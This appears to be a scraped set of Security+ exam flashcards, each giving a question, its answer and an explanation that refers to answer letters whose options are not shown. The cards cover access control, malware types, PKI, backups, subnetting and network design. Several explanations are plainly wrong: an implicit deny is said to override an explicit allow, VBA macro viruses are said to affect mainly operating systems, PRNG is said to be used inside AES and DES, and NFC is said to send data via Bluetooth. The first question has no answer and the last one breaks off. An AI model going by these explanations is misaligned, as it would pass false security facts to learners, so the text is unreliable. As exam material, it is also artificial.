general purpose guides only What type of documentation includes rules for ISO compliance, adhering to NIST guidelines, and conforming to PCI-DSS and other standards?

You are designing an access control system for a new company. The company has asked that you ensure that users are authenticated with a central server. In addition, users should only have access to the files they need to perform their jobs. When implementing access control, what is the appropriate order?

identification, authentication, authorization The appropriate order for access control is identification, authentication, and authorization. Identification is the process of identifying a user based on a user name, user identification (ID), or account number. Authentication is the process of validating the user with a second piece of information, usually a password, passphrase, or personal identification number (PIN). Authorization is the process of granting the user access to data based on the user identity and permissions.Authentication, authorization, and accounting (AAA) is a term for controlling access to computer resources using authentication, enforcing policies using authorization, and auditing usage and providing the information necessary to bill for services using accounting.

Which access control principle ensures that a particular role has more than one person trained to perform its duties?

job rotation Job rotation ensures that a particular role has more than one person trained to perform its duties. Personnel should be periodically rotated, particularly in important positions. Job rotation and separation of duties also help to prevent collusion.Answer C is incorrect. Separation of duties requires the involvement of more than one individual to accomplish a critical task. Separation of duties ensures that no individual can compromise a system, and is considered valuable in deterring fraud. Separation of duties can be either static or dynamic. Static separation of duties refers to the assignment of individuals to roles and to the allocation of transactions to roles. In static separation of duties, an individual can be either an initiator of the transaction or the authorizer of the transaction. In dynamic separation of duties, an individual can initiate as well as authorize transactions.Answer D is incorrect. The principle of least privilege grants users only those permissions they need to do their work. Limiting user access to administrative accounts is part of this principle. A need-to-know security policy is based on the principle of least privilege. The least privilege principle is most commonly associated with mandatory access control (MAC.)Answer A is incorrect. An implicit deny ensures that certain users are not allowed to access a certain file, folder, or application. An implicit deny overrides all other permissions, including an explicit allow.

What is another term for technical controls?

logical controls Another term for technical controls is logical controls. Technical controls are used to restrict data access and operating system components, security applications, network devices, protocols, and encryption techniques.Answer D is incorrect. Access controls can be included as part of technical controls. However, access controls are not a term that is synonymous with technical controls.Answer C is incorrect. Detective controls are controls that are used to detect intrusion when it occurs. While you can include detective technical controls in your security plan, detective controls can be technical, physical, or administrative. Detective technical controls include audit logs and intrusion detection systems (IDSs).Answer B is incorrect. Preventative controls are controls that are used to prevent intrusion before it occurs. While you can include preventative technical controls in your security plan, preventative controls can be technical, physical, or administrative. Preventative technical controls include access control lists (ACLs), routers, encryption, antivirus software, encryption, smart cards, and call-back systems.Technical or logical controls include all authentication mechanisms, including password, two-factor, Kerberos, and RADIUS authentication. Network segmentation is accomplished by using logical controls.There are three categories of access control: technical, administrative, and physical controls. A technical control is a control that is put into place to restrict access. Technical controls work to protect system access, network architecture and access, control zones, auditing, and encryption and protocols. An administrative or management control is developed to dictate how security policies are implemented to fulfill the company's security goals. Administrative controls include policies and procedures, personnel controls, supervisory structure, security training, and testing. A physical or operational control is a control that is implemented to secure physical access to an object, such as a building, a room, or a computer. Physical controls include network segregation, perimeter security, computer controls, work area separation, backups, and cabling.The three access control categories provide seven different functionalities or types: preventative - A preventative control prevents security breaches. detective - A detective control detects security breaches as they occur. corrective - A corrective control attempts to correct any damage that has been inflicted during a security breach and restores control. deterrent - A deterrent control deters potentials violations. recovery - A recovery control restores resources. compensative - A compensative control provides an alternative control if another control may be too expensive. All controls are generally considered compensative. directive - A directive control provides mandatory controls based on regulations or environmental requirements. Each category of control includes controls that provide different functions. For example, a security badge is both a preventative physical control and a compensative physical control. Monitoring and supervising are both a detective administrative control and a compensative administrative control.

After troubleshooting an issue on a Windows computer, the IT technician determines that the computer has been infected by a platform-independent virus that was written in an application's language and is capable of infecting any files using that language. Which virus is present?

macro virus Macro viruses are programs written in Word Basic, Visual Basic, or VBScript. Macro viruses are platform-independent and pose a major threat because their underlying language is simple, so they are easy to develop. Macro viruses can infect files that are written in the same language as the macro virus is written. They do not rely on the size of the packet. The ability of macro viruses to move from one operating system to the other allows them to spread more effectively than other types of viruses. Macro viruses are typically used with Microsoft Office products. Answer C is incorrect. A stealth virus hides the changes it makes to system files and boot records, making it difficult for antivirus software to detect its presence. A stealth virus keeps a copy of a file before infecting it and presents the original copy to the monitoring software. The stealth virus modifies the actual file and makes it difficult to detect the presence of the virus. Answer B is incorrect. A self-garbling virus can hide itself from antivirus software by manipulating its own code. When a self-garbling virus spreads, it jumbles and garbles its own code to prevent the antivirus software from detecting its presence. A small part of the virus code later decodes the jumbled part to obtain the rest of the virus code to infect the system. The ability of the self-garbling virus to format its own code makes it difficult for an antivirus to detect its presence. Answer A is incorrect. A polymorphic virus produces different operational copies of itself to evade detection by the antivirus software. It creates multiple operational copies to ensure that in the event of antivirus detection, only a few copies are caught. A polymorphic virus is also capable of implementing encryption routines that will require different decryption routines to avoid detection. A polymorphic virus is part of a group polymorphic malware. This is harmful computer software such as a virus, worm, Trojan, or spyware. These programs constantly change to make it difficult to detect with anti-malware programs. Macro viruses written in Visual Basic for Applications almost exclusively affect operating systems.

Management wants to install an Internet gateway, firewall, and Internet caching server on a new private network. You would prefer that a single device be installed to provide these services. Which network device should you install?

proxy server A proxy server acts as an Internet gateway, firewall, and Internet caching server for a private network. Hosts on the private network contact the proxy server with an Internet Web site request. The proxy server checks its cache to see if a locally stored copy of the site is available. If not, the proxy server communicates with its Internet connection to retrieve the Web site. The proxy server is virtually invisible to the client and the Internet connection. A proxy server can be configured to allow only outgoing Hypertext Transfer Protocol (HTTP) traffic by configuring which users have permissions to access the Internet via the proxy server.Answer A is incorrect. A virtual private network (VPN) is a private network that users can connect to over a public network. Often a VPN is implemented with a firewall to allow remote employees to connect to local resources. A VPN concentrator is the device that creates the VPN.Answer D is incorrect. An intrusion detection system (IDS) is a network device that detects network intrusion and either logs the intrusion or contacts the appropriate personnel.Answer C is incorrect. An intrusion prevention system (IPS) is a network device that detects network intrusion attempts and prevents the network intrusion. An IPS provides more security than an IDS because it actually provides prevention, not just detection.An Internet gateway can also be referred to as a Web security gateway. Its purpose is to defend against advanced Web attacks at the gateway.Firewalls, IDSs, IPSs, and proxies are often classified as application-aware devices because many of them can be configured to allow or deny traffic based on the application requesting access.

Your client's HR practices include promotion from within, and transferring people between offices on a regular basis. It seems like the most common question you hear when employees talk on the phone is "What office are you working at now and what are you doing?" What practice will ensure that a user's permissions are relevant and current?

recertification Recertification is the process of examining a user's permissions and determining if they still need access to what was previously granted. For example, if someone were transferred from the Chicago, IL office to the Charlotte, NC, it would be reasonable to revoke the user's Chicago permissions. Likewise, a promotion would most likely require new privileges, and it is important to examine whether the privileges from the old position are still necessary. Answer C is incorrect. Federation and federated identity is the ability of a user to use a single identity across multiple businesses or networks. It differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation would address enabling user's logon from office to office, but would not address the issue of current and relevant permissions related to users' job roles.Answer B is incorrect. Creating a standard naming convention would resolve an issue relating to account names that identify job roles or locations. However, it would not address the issue of current and relevant permissions.Answer A is incorrect. Transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain, through a transitive relationship.

You have decided to attach a digital timestamp to a document that is shared on the network. Which attack does this prevent?

replay attack Digital timestamps prove helpful in preventing replay attacks. In a replay attack, the attacker monitors the traffic stream in a network. The attacker maliciously repeats or delays the transmission of valid data over the network. Setting a threshold time value on each system ensures that the computer only accepts packets within a specified time frame. A packet received after the specified time will indicate the chances of a replay attack. Digital timestamps are attached to a document at document creation.Answer A is incorrect. In a side channel attack, the attacker gains information about the encryption algorithms from the cryptosystem that is implemented in the network. The attacker can use information, such as power consumption, electromagnetic radiations, and sound to break into a system. The side channel attack can also be based on the measurement of time taken to perform a computation.Answer B is incorrect. A ciphertext-only attack is primarily focused on discovering the encryption key by gathering multiple encrypted messages and then trying to deduce a pattern from the encrypted messages. Answer C is incorrect. A known-plaintext attack primarily focuses on the discovery of the key used to encrypt the messages. The key can be used to decrypt and read messages. The attacker has access to multiple instances of plaintext and ciphertext for several messages.

Your company has recently decided to create a custom application instead of purchasing a commercial alternative. As the security administrator, you have been asked to develop security policies and procedures on examining the written code to discover any security holes that may exist. Which assessment type will be performed as a result of this new policy?

secure code review Secure code review examines all written code for any security holes that may exist. Secure code review should occur initially in software development. Secure coding concepts include exception handling, error handling, and input validation. During the system development life cycle (SDLC), secure coding concepts are included as part of application hardening.Answer A is incorrect. Baseline reporting ensures that security policies are being implemented properly. By providing baselines, gap analysis can determine if the current configuration has been changed in any way.Answer D is incorrect. Review design includes any steps you take to review the design of your network, devices, and applications. It often involves examining the ports and protocols used and the access control practices implemented. Answer C is incorrect. Vulnerability scanning looks for weaknesses in applications, devices, and networks.You can also determine the attack surface and review architecture to help with the assessment. While both of these will allow you to identify areas where attacks may occur, they each assess different aspects. Determining the attack surface will help you identify the different components that can be attacked, and reviewing the architecture will help you identify network architecture security issues.For the Security+ exam, you must understand that all environments that you work in must be secured. All security patches and controls should be deployed in all physical and virtual environments, including the development, test, staging, and production environments. If you use smart card authentication in your production environment, you should also deploy it in the development, test, and staging environment so that all development, testing, and staging occurs in an environment that is identical to the production environment.

What concept is being illustrated when user accounts are created by one employee and user permissions are configured by another employee?

separation of duties

What is another name for a cross-site request forgery (XSRF)?

session riding Another name for cross-site request forgery (XSRF) is session riding. This application issue involves unauthorized commands coming from a trusted user to a user or Web site. It usually involves social networking. A good example is when two friends are chatting in an instant message application. During the session, user1 sends user2 a link to a video, but when user2 clicks the video, confidential information, such as bank account information, is sent to user1. Sometimes this attack is referred to as a one-click attack.Answer C is incorrect. Baselining is the process of comparing performance to a recorded metric.A buffer overflow is a type of denial of service (DoS) attack and occurs when more data is put into the buffer that it can handle.Answer B is incorrect. A macro virus is programming instructions in a programming language that commands an application to perform illegal actions.Answer A is incorrect. Another issue to understand is arbitrary code execution or remote code execution. Personnel should be cautioned against running code from an entity they do not know or trust. Often attackers will make the remote code look official to trick users into running it.

You have been asked to implement a biometric method that analyzes both the physical motions that are performed when a signature is signed and the specific features of a person's signature. Which biometric system should you implement?

signature dynamics Signature dynamics is the biometric method that analyzes both the physical motions performed when a signature is signed and the specific features of a person's signature. It usually captures the speed of the signing, the pressure of the pen when signing, and the way the pen is held. Hand geometry is a biometric method that analyzes the length and width of the hand. A digital signature is a method whereby the identity of the person sending the data is verified. It ensures that the original data has not been modified. Keystroke dynamics records a user's speed and motion when entering a phrase and compares it to stored data. Dynamic signature verification (DSV) is another term for signature dynamics.

You have installed an intrusion detection system (IDS) that watches for intrusions that match a known identity. Which type of IDS did you install?

signature-based IDS A signature-based IDS watches for intrusions that match a known identity or signature. All attack signatures are contained in a signature database. The signature database must be updated for a signature-based IDS to remain effective.Answer D is incorrect. A network-based IDS is attached to the network in a place where it can monitor all network traffic. It implements passive and active responses. Passive responses include logging, notification, and shunning. Active responses include terminating processes or sessions, network configuration changes, and deception. Answer A is incorrect. An anomaly-based IDS detects activities that are unusual. With this type of IDS, there is an initial learning period before anomalies can be detected. Once the baselines are established, an anomaly-based IDS can detect anomalous activities. Sometimes the baseline is established through a manual process.Answer B is incorrect. A behavior-based IDS detects behavior that is not allowed and acts accordingly. An IDS allows a security administrator to identify malicious activity after it has occurred. An intrusion prevention system (IPS) allows a security administrator to prevent malicious activity when it is attempted.

Which of the following would take the least amount of time to restore?

snapshots A snapshot is an image of the system at a given point in time. If a system crashed, restoring the snapshot would be the fastest way to restore the system. Answer C is incorrect. Differential backups begin with a full backup. On each day thereafter, you would back up all of the changes that had occurred since the last full backup. The order of restoration would be to restore the last full backup first, and then to restore the most recent differential backup.Answer D is incorrect. Incremental backups begin with a full backup. On each day thereafter, you would back up that day's changes. The order of restoration would be to restore the last full backup first, and then to restore each day's incremental backup in order from oldest to newest.Answer A is incorrect. Performing a full restoration using a full backup takes longer than restoring from a snapshot. The order of restoration if you did not have the appropriate backups would be to reinstall the OS, reinstall the applications, and then reinstall the user data.

A user accidentally installed a driver that had issues. You have been asked to return the computer to its state prior to the driver installation. Which of these is most likely the quickest method of meeting this requirement?

snapshots Most likely, the quickest way to do this is to use snapshots. Snapshots are system images that reflect the state of the system at a certain point in time. It is advantageous to take a snapshot of the system prior to making major system changes, "just in case" something goes wrong during the change. Restoring using a snapshot would also allow you to recover whatever user data and settings existed at the time of the snapshot. Live boot media involves creating bootable flash drives, DVDs. In the event of a major system failure, you can use the live boot media to boot and troubleshoot the system. However, no user data would be restored. Answers D, C, and B are incorrect. A master image would restore the system to the original configuration state, but all the user data and user settings would be lost. Master image allows you to create a standardized system configuration, such as an ISO file. This will ensure that all systems configured with the master image have the same configuration. The master image can be stored on a server and used in the event of disaster recovery, malware infections, new systems, and so on. Other resiliency techniques include non-persistence, rollback, and reverting to known state. Non-persistence deals with system images that are temporary, typically stored in RAM, and can be replaced by deploying a permanent image. Revert to known state and rollback to known configuration are synonymous. In the event of a system crash, accessing these options during the boot process will allow you to instantly restore the system to an earlier state when everything worked.

Which encryption techniques are used by AES, DES, and Blowfish?

symmetrical PRNG Advanced Encryption Standard (AES), Data Encryption Standard (DES), and Blowfish are examples of symmetrical algorithms and pseudo-random number generation (PRNG). Symmetric algorithms are sometimes called block ciphers.Random number generation and pseudo-random number generation are types of algorithms used to generate cryptographic keys. PRNG uses a symmetric algorithm to generate a number that is "random enough" for cryptographic purposes. PRNG is used in AES, DES, and Blowfish. Random number generation is used in asymmetric ciphers, such as RSA, Diffie-Hellman, and Elliptic Curve Cryptosystem (ECC). For the Security+ exam, you will also need to understand collision, obfuscation, and key strength.Diffusion is the cryptographic technique whereby a change of a single input bit results in a change of multiple output bits. A collision is the result of a hashing algorithm producing the same output from two different inputs. Obfuscation is the basic foundation of both encryption and steganography. The term means to hide something so that it is not easily readable. Key strength should reflect the sensitivity of the data it protects. Generally, as the need to secure the data increases, so should the strength of the key. Longer keys require more processing power (and time) to break.

What is meant by MTBF?

the average amount of time from one failure to the next The mean time between failures (MTBF) is the average amount of time from one failure to the next. The MTBF is usually supplied by the hardware vendor or a third party. The mean time to repair (MTTR) is the amount of time that it will take to repair a piece of equipment when failure occurs.

Management has asked you to ensure that the certificates that have been validated in the corporate PKI are protected. What must be secured in the PKI?

the private key of the root CA The private key of the root certification authority (CA) must be secured to ensure that the certificates that have been validated in a public key infrastructure (PKI) are protected. If the private key of the root CA has been compromised, then a new root certificate must be created and the PKI must be rebuilt. Answers B, C, and D are incorrect. The public key is found in the trusted root CA. If the private key of a user's certificate has been compromised, then a new certificate should be created for that user and the user's compromised certificate should be revoked. The compromise of a user's certificate will not jeopardize other certificates in a PKI. A public key, as its name implies, is public, and does not need to be kept secret. If the private key of a server has been compromised by an intruder, you should submit the public key to the CRL.

You have recently implemented a new public key infrastructure (PKI) for your organization. You need to back up the entity that is responsible for certifying the public key pair of the root CA. Which entity must you back up?

the root CA You should back up the root CA. The root certification authority (CA) must certify its own public key pair. An organization may also want to have a root CA's public key pair certified by an external CA for added security and confidence in the key pair. Neither a subordinate CA nor a Kerberos server is used to certify a root CA's key pair.A subordinate or intermediate CA issues certificates that have been issued by a root authority or by another higher-level intermediate authority. Organizations frequently take the root CA offline for security reasons and allow the intermediate CA to actually issue certificates.

Your company has recently implemented a content inspection application on a perimeter firewall. What is the purpose of content inspection?

to search for malicious code or behavior The purpose of content inspection is to search for malicious code or suspicious behavior.Answer A is incorrect. The purpose of load balancing is to distribute the workload across multiple devices. Often DNS servers are load balanced to ensure that DNS clients can obtain DNS information as needed. Other services are load balanced as well. Load balancers optimize and distribute data workloads across multiple computers or networks.Answer D is incorrect. The purpose of an Internet or Web proxy is to filter and forward Web content anonymously.Answer C is incorrect. The purpose of a spam filter is to identify and block unwanted messages. Spam filters should be configured to prevent employees from receiving unsolicited e-mail messages.Another type of hardware that is similar to a spam filter is an all-in-one security appliance. This device filters all types of malicious, wasteful, or otherwise unwanted traffic.Many all-in-one security appliances include a component that performs content inspection and malware inspection. These appliances usually also include a URL filter feature that allows administrators to block and allow certain Web sites.For example, the URL filter in an all-in-one security appliance could be configured to restrict access to peer-to-peer file sharing Web sites.

Your company has a backup solution that performs a full backup each Saturday evening and an incremental backup all other evenings. A vital system crashes on Monday morning. How many backups will need to be restored?

two Because the system crashes on Monday morning, you will need to restore two backups: the full backup from Saturday evening and the incremental backup from Sunday evening. When incremental backups are included in your backup plan, you will need to restore the full backup and all incremental backups that have been taken since the full backup. Because the failure occurred on Monday morning, only the full Saturday backup and the incremental Sunday backup need to be restored.If the crash had occurred on Tuesday morning, you would have needed to restore three backups: Saturday evening's full backup, Sunday evening's incremental backup, and Monday evening's incremental backup.If the crash had occurred on Wednesday morning, you would have needed to restore four backups: Saturday evening's full backup, Sunday evening's incremental backup, Monday evening's incremental backup, and Tuesday evening's incremental backup.

You have implemented the three databases that your organization uses to ensure that an entire transaction must be executed to ensure data integrity. If a portion of a transaction cannot complete, the entire transaction is not performed. Which database security mechanism are you using?

two-phase commit You are using the two-phase commit. A two-phase commit ensures that the entire transaction is executed to ensure data integrity. If a portion of a transaction cannot complete, the entire transaction is not performed.Answer C is incorrect. Concurrency ensures that the most up-to-date information is shown to database users. To ensure concurrency, locks are often implemented at the page, table, row, or field level to ensure updates happen one at a time. Answer B is incorrect. Savepoints ensure that the database can return to a previous state if a system failure occurs. A savepoint will usually save part of the data update. Savepoints are a security mechanism to ensure data integrity.Answer A is incorrect. Aggregation occurs when a user can take information for different sources and combines them to accurately predict that the user does not have the clearance to view directly.

What is an example of a brute force attack?

using a program to guess passwords from a SAM file Using a program to guess passwords from a Security Account Manager (SAM) file is an example of a brute force attack. A SAM file, which is used on some Windows networks, contains encrypted passwords. A hacker can initiate a brute force attack in an attempt to decrypt passwords stored in a SAM file. You can defend against a brute force network attack by increasing the complexity and keyspace requirements of the password. Answer D is incorrect. Sending multiple Internet Control Message Protocol (ICMP) messages to a Web server is a type of denial of service (DoS) attack that is referred to as a ping of death. Answer C is incorrect. Searching through a company's trash to find sensitive information is a type of physical attack that is sometimes referred to as dumpster diving. Answer B is incorrect. Using a packet analyzer to gather packets from a network connection between two computers is a method that can be used to initiate a man in the middle (MITM) attack.

Which types of computers are targeted by RedPill and Scooby Doo attacks?

virtual machines RedPill and Scooby Doo attacks target virtual machines. These attacks attempt to detect virtual servers and machines on a network. Once the virtual machines are identified, various techniques are used to attack the virtual machines to breach the host and eventually the network.Answers B, C, and D are incorrect. RedPill and Scooby Doo attacks do not target Windows Server 2008 computers, Windows Vista clients, or terminal servers, unless these computers exist as virtual servers or virtual machines. Virtual machines are usually implemented within an organization so that the organization can internally manage them. Cloud computing differs from virtual computing in that cloud computing is usually physically managed by an outside entity. An organization pays the cloud computing organization for rights to use portions of the organization's cloud. However, the organization that is leasing the cloud is never really in physical control of the data.

Your company has decided to implement a biometric system to ensure that only authorized personnel is able to access several secure areas at the facility. However, management is concerned that users will have privacy concerns when the biometric system is implemented. You have been asked to recommend the least intrusive biometric system of the listed options. Which option is considered the least intrusive?

voice print A voice print is considered less intrusive than the other options given. A voice recognition scanner is used to capture a voice print.Retinal scanners and iris scanners are used to scan the retina and iris, respectively. A fingerprint scanner is used to scan a fingerprint. Both an iris scan and a retinal scan are considered more intrusive because of the way in which the scan is completed. Most people are reluctant to have a scanner read any eye geometrics. A fingerprint scanner is used to scan a fingerprint. A fingerprint scan is more intrusive than a voice print. Most people are reluctant to give their fingerprints because fingerprints can be used by law enforcement. A voice print is very easy to obtain. Its primary purpose is to distinguish a person's manner of speaking and voice patterns. Voice print systems are easy to implement compared to some other biometric methods. Voice prints are usually reliable and flexible.A facial recognition scanner is used to scan facial characteristics. A facial scan is based on an individual's bone structure, nose ridge, eye width, forehead structure, and chin shape.

Recently, several confidential messages from your company have been intercepted. Your company has decided to implement PGP to encrypt files. Which type of model does this encryption use?

web Pretty Good Privacy (PGP) uses a web of trust to validate public key pairs. In a web of trust model, users sign their own key pairs. If a user wants to receive a file encrypted with PGP, the user must first supply the public key. In a public key infrastructure (PKI), certification authorities (CAs) are arranged in a hierarchy and sign public key pairs. Many older Ethernet networks used a bus model for their physical architecture. In a bus network, all computers on a network are connected to a central bus cable. A ring model is used to wire computers in token ring networks. In a ring network, all computers are connected to a physical ring of cable.GNU Privacy Guard (GPG) is an alternative to the PGP suite of cryptographic software. It uses a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange. GPG currently supports the following algorithms: Pubkey: RSA, ElGamal, DSA Cipher: IDEA (from 1.4.13/2.0.20), 3DES, CAST5, Blowfish, AES-128, AES-192, AES-256, Twofish, Camellia-128, Camellia-192, Camellia-256 (from 1.4.10/2.0.12) Hash: MD5, SHA-1, RIPEMD-160, SHA-256, SHA-384, SHA-512, SHA-224

You instruct a user to issues the ipconfig command with the /release and /renew options. In which two situations would it be appropriate to ask a user to do this?

when recent scope changes have been made on the DHCP server when the result of running the ipconfig /all command indicates a 169.254.163.6 address It would it be appropriate to issue the ipconfig command with the /release and /renew options in the following situations: When the result of running the ipconfig /all command indicates a 169.254.163.6 address When recent scope changes have been made on the DHCP server When a computer has an address in the 169.254.0.0 network, it indicates that the computer has not been issued an address from the DHCP server. Instead, the computer has utilized Automatic Private IP Addressing (APIPA) to issue itself an address. If the reason for this assignment is a temporary problem with the DHCP server or some other transitory network problem, issuing the ipconfig /release command followed by the ipconfig /renew command could allow the computer to receive the address from the DHCP sever.Similarly, if changes have been made to the settings on the DHCP server, such as a change in the scope options (such as gateway or DNS server), issuing this pair of commands would update the DHCP client with the new settings when this address is renewed.These commands will have no effect if no IP helper address has been configured on the router between the client and the DHCP server. An IP helper address can be configured on the local interface of a router when no DHCP server exists on that subnet and you would like to allow the router to forward DHCP DISCOVER packets to the DHCP server on a remote subnet. DHCP DISCOVER packets are broadcast, and routers do not pass on broadcast traffic by default. These commands will have no effect if the no ip directed-broadcast command has been issued in the router interface that is local to the client, and an IP helper address has not been configured on the router between the client and the DHCP server. The no ip directed-broadcast command instructs the router to deny broadcast traffic, which is the default behavior. Under those conditions, the command will not result in finding the DHCP server or receiving an address.

Your network uses the subnet mask 255.255.255.224. Which of the following IPv4 addresses are able to communicate with each other? (Select the two best answers.)

10.36.36.166 10.36.36.184 The hosts using the IP addresses 10.36.36.166 and 10.36.36.184 would be able to communicate with each other because they are on the same subnet (known as subnet ID 5). All of the other answer choices' IP addresses are on different subnets, so they would not be able to communicate with each other (or with the IP addresses of the correct answers) by default. Table 6-6 provides the complete list of subnets and their ranges for this particular subnetted network. It is noteworthy that the answer 10.36.36.224 is not even usable because it is the first IP of one of the subnets. Remember that the general rule is: you can't use the first and last IP within each subnet. That is because they are reserved for the subnet ID and the broadcast addresses, respectively.

Which of the following authentication protocols makes use of a supplicant, authenticator, and authentication server?

802.1X 802.1X makes use of three components: a supplicant, which is software running on a workstation; an authenticator, which is a wireless access point or switch; and an authentication server, which is an authentication database, most likely a RADIUS server.Kerberos makes use of a key distribution center that works with tickets to prove the identity of users. RADIUS provides centralized administration of dial-up, VPN, and wireless authentication and can be used with 802.1X and EAP (Extensible Authentication Protocol). LDAP (Lightweight Directory Access Protocol) can access and modify directory services data.

DMZ

A special area of the network (sometimes referred to as a subnetwork) that houses servers that host information accessed by clients or other networks on the Internet.

You have been tasked to implement an encryption algorithm that has a key length of 128 bits. Which of the following is the only solution?

AES AES-128 is a 128-bit cipher, meaning it has a key length of 128 bits. However, a more secure solution would be to use AES-256 (256-bit key length). SHA-1 is 160-bit, and SHA-2 is 256- or 512-bit in key length. DES is 56-bit, and its successor 3DES is 168-bit.

You have collected login information, file access information, security log files, and unauthorized security violations. What is this collection known as?

Audit trail An audit trail is a collection of security log files, unauthorized security violations, and other logged information such as successful or failed logins. The audit is the technical assessment made of applications, files, and networks; quite often this includes an audit trail. An access control list (ACL) is a set of rules or permissions. The security log is the log file in Windows (found in the Event Viewer) that shows security violations or allowed access whether they succeeded or not; it works when auditing has been turned on.

What two security precautions can best help to protect against wireless network attacks?

Authentication and WPA The best two security precautions are authentication and WPA. Although WPA2 is more secure than WPA, the term "identification" is not correct. WEP is a deprecated wireless encryption protocol and should be avoided.

Which of the following protocols or services uses port 19?

CHARGEN CHARGEN, the character generator, uses port 19. It is commonly used by a Fraggle attack. Echo uses port 7. Telnet uses port 23. SMTP uses port 25.

You are required to renew an SSL certificate for a web server. Which of the following should you submit to the certificate authority?

CSR A CSR (certificate signing request) is used when a new, or renewed, certificate is required for a web server. It is submitted to the company that sells the SSL certificates (such as VeriSign). A private key is first generated (usually an RSA key), which the CSR is based on, but that key should be kept private. Only the admin should know the key. A CRL (certificate revocation list) contains certificates that have expired or have been revoked because they were compromised. RA can stand for either registration authority, which works in conjunction with the CA, or recovery agent, which is needed to recover keys that have been lost.

A recent security audit has uncovered an increase in the number MITM attacks during the certificate validation process. Which of the following is a way to add security to the certificate validation process to help detect and block many types of MITM attacks by adding an extra step beyond normal X.509 certificate validation?

Certificate pinning One way to add security to the certificate validation process is to use certificate pinning (also known as SSL pinning or public key pinning). This can help to detect and block many types of MITM (man-in-the-middle) attacks by adding an extra step beyond normal X.509 certificate validation. OID (object identifier) stapling is invalid here. However, OCSP (Online Certificate Status Protocol) stapling allows the presenter of the certificate to bear the cost involved when providing OCSP responses and OIDs are built into Active Directory Certificate Services (AD CS) for either low, medium, or high assurance. Secure Shell (SSH) is a protocol that can create a secure channel between two computers or network devices, enabling one computer or device to remotely control the other. Secure/Multipurpose Internet Mail Extensions (S/MIME) is an IETF standard that provides cryptographic security for electronic messaging such as e-mail. It is used for authentication, message integrity, and non-repudiation of origin.

Which of the following would you set up in a multifunction SOHO router?

DMZ A DMZ, or demilitarized zone, can be set up on a SOHO router (in the firewall portion) to create a sort of safe haven for servers. It is neither the LAN nor the Internet, but instead, a location in between the two.

A security analyst wants to ensure that all external traffic is able to access an organization's front-end servers but also wants to protect access to internal resources. Which network design element is the best option for the security analyst?

DMZ The demilitarized zone (DMZ) is the best option in this scenario. By creating a DMZ, and placing the front-end servers within it (on a separate branch of the firewall), you create a type of compartmentalization between the LAN (important internal resources) and the front-end servers. A VLAN is used to separate a LAN into multiple virtual units. Virtualization is a general term that usually refers to the virtualizing of operating systems. Cloud computing is another possible option in this scenario, because you could take the front-end servers and move them to the cloud. However, a certain level of control is lost when this is done, whereas with a DMZ, the security analyst still retains complete control.

Your boss asks you to replace the current RADIUS authentication system with a more secure system. Your current RADIUS solution supports EAP, and your new solution should do the same. Which of the following is the best option and would offer the easiest transition?

Diameter The Diameter protocol is, like RADIUS, another AAA protocol, but is a more evolved protocol and utilizes more reliable transport mechanisms such as TCP and Stream Control Transmission Protocol (SCTP), as opposed to UDP. Like RADIUS, many Diameter applications allow for the use of the Extensible Authentication Protocol (EAP). CHAP (Challenge-Handshake Authentication Protocol) is an authentication scheme used to authenticate a user or host. Whereas RADIUS and Diameter are authentication systems, they both make use of authentication schemes such as PAP, CHAP, and EAP. SAML (Security Assertion Markup Language) is an XML-based open standard for exchanging authentication and authorization data between two parties. It helps alleviate problems with single sign-on (SSO). Kerberos is another type of authentication system, but is used more commonly in localized environments; it is not meant as a replacement for RADIUS.

What would you use a TPM for?

Full disc encryption A TPM (trusted platform module) is a chip that resides on a motherboard (or similar location) that stores encrypted keys used to encrypt the entire hard disk on the system. Input validation is a technique used by programmers to secure their forms. System hardening is the process of securing a computer system through updates, closing ports, and so on. Cloud computing is the use of web-based applications (and other software, platforms, and infrastructures) that are provided by an external source on the Internet.

Randy needs an external add-on solution that can provide encryption and integrate with his existing database server. Which of the following would meet his needs?

HSM An HSM (hardware security module) provides encryption and can be an external device that can integrate with an existing server. A TPM (trusted platform module) is an encrypting chip that resides on a motherboard. FDE stands for full disk encryption, which can be implemented with a TPM. CAC stands for Common Access Card, a smart ID card used by the Department of Defense (DoD).

Which of the following attacks involves the interception of authentication traffic on a wireless network?

IV Attack The IV (initialization vector) attack is when an attacker deciphers the fixed-size input at the beginning of each WEP or WPA packet. WEP is much more susceptible. To avoid the attack, use WPA2. An evil twin is a rogue access point that is controlled by an attacker. It has the same name and configuration as one of the legitimate WAPs in an organization. A replay attack is a network attack in which data packets are repeated or delayed by an outside attacker. Near field communication (NFC) is a technology of mobile devices that allows them to automatically pair and transmit data via Bluetooth.

Your boss (the IT director) wants to move several internally developed software applications to an alternate environment, supported by a third party, in an effort to reduce the footprint of the server room. Which of the following is the IT director proposing?

IaaS The IT director is most likely proposing that you use infrastructure as a service (IaaS). A cloud-based service, IaaS is often used to house servers (within virtual machines) that store developed applications. It differs from PaaS in that it is the servers, and already developed applications, that are being moved from the server room to the cloud. However, PaaS might also be required if the applications require further development. The most basic cloud-based service, software as a service (SaaS), is when users work with applications (often web-based) that are provided from the cloud. A community cloud is when multiple organizations share certain aspects of a public cloud.

Which of the following concepts best describes the mandatory access control model?

Lattice Mandatory access control (MAC) has two common implementations: rule-based access control and lattice-based access control. Lattice-based access control is used for more complex determinations of object access by subjects; this is done with advanced mathematics that creates sets of objects and subjects and defines how the two interact. Bell-LaPadula is a state machine model used for enforcing access control in government applications. It is a less- common, multilevel security derivative of mandatory access control. This model focuses on data confidentiality and controlled access to classified information. The Biba Integrity Model describes rules for the protection of data integrity. Clark-Wilson is another integrity model that provides a foundation for specifying and analyzing an integrity policy for a computing system.

You receive complaints about network connectivity being disrupted. You suspect that a user connected both ends of a network cable to two different ports on a switch. What can be done to prevent this?

Loop protection Loop protection should be enabled on the switch to prevent the looping that can occur when a person connects both ends of a network cable to the same switch. A DMZ is a demilitarized zone that is used to keep servers in a midway zone between the Internet and the LAN. VLAN segregation (or VLAN separation) is a way of preventing ARP poisoning. Port forwarding refers to logical ports associated with protocols.

Which wireless configurations can be easily circumvented using a network sniffer?

